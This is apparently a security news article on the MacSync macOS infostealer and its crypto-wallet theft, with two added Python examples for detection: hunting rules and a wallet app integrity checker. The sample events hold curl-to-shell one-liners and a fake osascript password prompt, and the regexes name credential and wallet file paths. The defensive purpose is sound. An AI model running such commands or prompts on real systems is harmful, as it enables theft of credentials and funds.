A new macOS malware named MacSync is posing a significant threat to cryptocurrency users, using social engineering rather than any exploit to harvest sensitive data. This infostealer, sold as Malware-as-a-Service (MaaS), tricks victims into pasting a single command into the Terminal application; the user's own shell then fetches and runs the payload, so the compromise never passes through the checks macOS applies to a downloaded app. Researchers discovered MacSync while investigating phishing campaigns mimicking Microsoft login pages, which led to fake cloud storage installer pages that walk users through the deceptive Terminal installation.
MacSync represents a notable evolution from earlier threats such as the Mac.c stealer. Its low price and modular design, tailored to cryptocurrency data theft, make it an attractive tool for cybercriminals. The infection mechanism exploits user trust: landing pages mimic legitimate software, complete with indicators such as a "Verified Publisher" badge. A single copied command, once pasted into the Terminal, initiates the entire compromise. This sidesteps Gatekeeper and notarization rather than defeating them: those checks fire on files that carry the quarantine attribute, which a script pulled down by curl and handed straight to a shell never acquires, and it is the user, not the system, who chooses to execute it.
The MacSync Infection Mechanism and Data Harvesting Strategy Emerge
Security researchers at CloudSEK have detailed MacSync's multi-stage attack, which operates entirely through scripts rather than compiled binaries. The pasted command downloads a Zsh loader that daemonizes itself: it detaches from the Terminal session, so closing the window does not stop it, and keeps running silently in the background. The loader then retrieves a remote AppleScript payload and executes it; that script holds the core data-stealing functionality.
MacSync's primary objective is the extraction of cryptocurrency-related data. Upon execution, the malware displays fake system dialogs that demand the victim's login password under the guise of system verification and re-displays them until the user gives in; the constant prompting is designed to wear down resistance. These dialogs are generated by the AppleScript payload itself. A genuine macOS authentication prompt is never produced by osascript, so an osascript process running while such a dialog is on screen is a strong indicator of compromise.
Once the password is obtained, MacSync systematically targets browser data. It harvests browser profiles from popular Chromium-based browsers such as Chrome, Brave, Edge, and Opera, extracting stored passwords and session cookies. The infostealer also targets numerous cryptocurrency wallet browser extensions and desktop wallet applications, including Exodus, Electrum, and Bitcoin Core, by locating their data directories and copying the wallet files that hold seed phrases and private keys.
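The chain described in the three paragraphs above (a curl-to-shell one-liner, a loader that detaches from the Terminal, an osascript password dialog, and a script interpreter reading credential and wallet stores) is what a hunt rule set should key on. The following is an added example, not CloudSEK's tooling and not anything taken from MacSync itself. The event schema (one dict per exec or file-open event with the keys used below) is an assumption; osquery or EDR output would need a small adapter. The sample events, the pasted one-liner and the example.invalid URLs are constructed for illustration, and the file paths are the default locations of the stores the article names, not paths taken from the malware.

```python
"""Hunting rules for a MacSync-style infection chain (added example, constructed data)."""
import re
from collections import Counter
from dataclasses import dataclass

SHELLS = {"zsh", "bash", "sh"}
# Processes that have no business opening browser, wallet or credential stores.
SCRIPT_READERS = SHELLS | {"osascript", "curl", "cp", "ditto", "cat"}

# Rule 1: a remote script fed straight into a shell, by pipe or by $(...).
CURL_TO_SHELL = re.compile(
    r"\bcurl\b[^|]*\|\s*(?:nohup\s+)?(?:zsh|bash|sh)\b"
    r"|\b(?:zsh|bash|sh)\s+-c\s+[\"']?\$\(\s*curl\b")
# Rule 2: the shell is told to outlive the Terminal session.
DETACH = re.compile(r"\bnohup\b|\bdisown\b|\bsetsid\b|&\s*$")
# Rule 3: an AppleScript dialog with masked input, i.e. a password prompt that
# does not come from the system's own SecurityAgent.
HIDDEN_ANSWER = re.compile(r"display dialog[\s\S]*with hidden answer")
# Rule 4: default macOS locations of the stores listed in the article (assumed
# to be what the stealer reads; extend for other wallets or browsers).
SENSITIVE_PATHS = re.compile(
    r"Library/Application Support/(?:Google/Chrome|BraveSoftware/Brave-Browser"
    r"|Microsoft Edge|com\.operasoftware\.Opera)(?:/[^/]+)*/(?:Login Data|Cookies)$"
    r"|Library/Application Support/(?:Exodus|Bitcoin)/"
    r"|/\.electrum/wallets/"
    r"|/\.ssh/"
    r"|/\.aws/credentials$"
    r"|Library/Keychains/"
    r"|Library/Group Containers/group\.com\.apple\.notes/")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def hunt(events):
    """Return one Finding per (rule, event) match; an event may hit several rules."""
    findings = []
    for ev in events:
        pid, proc = ev["pid"], ev["process"]
        if ev["type"] == "exec":
            cmd = ev["cmdline"]
            if CURL_TO_SHELL.search(cmd):
                findings.append(Finding("curl_pipe_shell", pid, cmd))
            if proc in SHELLS and DETACH.search(cmd):
                findings.append(Finding("detached_loader", pid, cmd))
            if proc == "osascript" and HIDDEN_ANSWER.search(cmd):
                findings.append(Finding("osascript_hidden_answer", pid, cmd))
        elif ev["type"] == "file_open":
            if proc in SCRIPT_READERS and SENSITIVE_PATHS.search(ev["path"]):
                findings.append(Finding("sensitive_file_access", pid, ev["path"]))
    return findings


def rules_hit(events):
    """Counts per rule, for a quick triage summary."""
    return dict(Counter(f.rule for f in hunt(events)))


# Constructed sample: one infected session (pids 501-504), a second pasted
# one-liner in the $(...) form (pid 601), and benign noise that must not fire.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 501, "ppid": 400, "process": "zsh",
     "cmdline": "curl -fsSL https://example.invalid/setup.sh | nohup zsh >/dev/null 2>&1 &"},
    {"type": "exec", "pid": 502, "ppid": 501, "process": "osascript",
     "cmdline": "osascript -e 'display dialog \"macOS needs to verify your identity\" "
                "default answer \"\" with hidden answer'"},
    {"type": "file_open", "pid": 503, "ppid": 501, "process": "osascript",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"type": "file_open", "pid": 504, "ppid": 501, "process": "cp",
     "path": "/Users/alice/.aws/credentials"},
    {"type": "exec", "pid": 601, "ppid": 400, "process": "bash",
     "cmdline": "bash -c \"$(curl -fsSL https://example.invalid/install.sh)\""},
    {"type": "exec", "pid": 700, "ppid": 400, "process": "curl",
     "cmdline": "curl -fsSL https://example.invalid/readme.txt -o readme.txt"},
    {"type": "file_open", "pid": 701, "ppid": 1, "process": "Google Chrome",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail}")
```

Rule 4 is deliberately keyed on the reading process rather than on the path alone: Chrome opening its own Login Data is normal, osascript or cp doing so is not. Rule 2 on its own is noisy on developer machines; its value is in correlating with rule 1 or 3 in the same process tree.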
Adding to its repertoire, the malware also pilfers SSH keys, AWS credentials, Keychain databases, and sensitive information stored in Apple Notes. To ensure long-term access and impact, MacSync conditionally trojanizes the Ledger and Trezor hardware wallet applications if it finds them on the infected system, overwriting critical application components so that the legitimate software is replaced with a malicious version. These fake applications present convincing phishing wizards designed to capture PINs and recovery phrases weeks or even months after the initial infection. Overwriting a bundle's sealed components invalidates the developer's code signature unless the attacker re-signs the bundle, so a code-signature verification of these apps is a cheap check worth running after any suspected incident.
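A concrete way to run that check for the trojanizing step described above, as an added example that is not part of the article or of any vendor tooling: verify the bundle with Apple's `codesign --verify --deep --strict`, which fails once any sealed component has been overwritten unless the bundle was re-signed, and keep a SHA-256 manifest recorded on a known-good day to catch a re-signed replacement too. The bundle paths in `WATCHED_BUNDLES` are assumptions (the article names only the vendors), and `demo()` builds a constructed toy bundle to show the drift report without touching a real installation.

```python
"""Signature plus manifest check for wallet app bundles (added example)."""
import hashlib
import json
import subprocess
import tempfile
from pathlib import Path

# Assumed default install locations; adjust for the machine being checked.
WATCHED_BUNDLES = ["/Applications/Ledger Live.app", "/Applications/Trezor Suite.app"]


def codesign_verify(bundle):
    """Run Apple's verifier. Returns 'ok', 'failed: <reason>', or None when
    codesign is not available (for example off macOS)."""
    try:
        r = subprocess.run(
            ["codesign", "--verify", "--deep", "--strict", "--verbose=2", str(bundle)],
            capture_output=True, text=True)
    except FileNotFoundError:
        return None
    return "ok" if r.returncode == 0 else f"failed: {r.stderr.strip()}"


def build_manifest(root):
    """Map every regular file under root (path relative to root) to its SHA-256."""
    root = Path(root)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file() and not p.is_symlink()):
        h = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                h.update(chunk)
        manifest[str(path.relative_to(root))] = h.hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Files added, removed and changed relative to the recorded baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(f for f in baseline.keys() & current.keys()
                          if baseline[f] != current[f]),
    }


def check_bundle(bundle, baseline_file):
    """Verify the signature and compare against a stored manifest.

    The first run writes the baseline (drift is None); later runs report drift."""
    bundle, baseline_file = Path(bundle), Path(baseline_file)
    result = {"bundle": str(bundle), "codesign": codesign_verify(bundle)}
    current = build_manifest(bundle)
    if baseline_file.exists():
        baseline = json.loads(baseline_file.read_text())
        result["drift"] = diff_manifests(baseline, current)
    else:
        baseline_file.write_text(json.dumps(current, indent=1))
        result["drift"] = None
    return result


def demo(workdir=None):
    """Constructed scenario: record a baseline for a toy bundle, then overwrite one
    component and drop in a new file, as a trojanized replacement would."""
    workdir = Path(workdir or tempfile.mkdtemp())
    bundle = workdir / "Wallet.app"
    genuine = {
        "Contents/MacOS/Wallet": b"\xcf\xfa\xed\xfe genuine binary",
        "Contents/Info.plist": b"<plist/>",
        "Contents/Resources/app.js": b"console.log('genuine')",
    }
    for rel, data in genuine.items():
        (bundle / rel).parent.mkdir(parents=True, exist_ok=True)
        (bundle / rel).write_bytes(data)
    baseline = workdir / "baseline.json"
    check_bundle(bundle, baseline)  # first run: records the baseline
    (bundle / "Contents/Resources/app.js").write_bytes(b"phishing wizard")
    (bundle / "Contents/Resources/seed.html").write_bytes(b"<form>")
    return check_bundle(bundle, baseline)["drift"]


if __name__ == "__main__":
    print(demo())
    for app in WATCHED_BUNDLES:
        if Path(app).exists():
            print(check_bundle(app, Path.home() / f".{Path(app).stem}.manifest.json"))
```

Store the baseline manifest somewhere the malware's user-level password cannot rewrite (another machine, or a read-only medium), otherwise a replacement that also refreshes the baseline goes unnoticed.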
The supporting infrastructure for MacSync is robust: at least eight rotating command-and-control (C2) domains that follow a consistent naming scheme, plus several variants of the lure page, which indicate a campaign that is still being developed and adapted. This reuse of infrastructure and the malware's modular design show MacSync to be a continuously evolving, scalable operation whose primary target remains the macOS cryptocurrency community, reached through the social engineering described above.
The ongoing evolution of MacSync highlights the persistent threat of sophisticated macOS malware targeting valuable financial data. Users are advised to exercise extreme caution with unexpected pop-ups and with any web page that asks them to paste a command into Terminal, to treat a password prompt that appears without an action they initiated as suspect, and to keep macOS and their security software up to date to avoid falling victim to such targeted attacks.

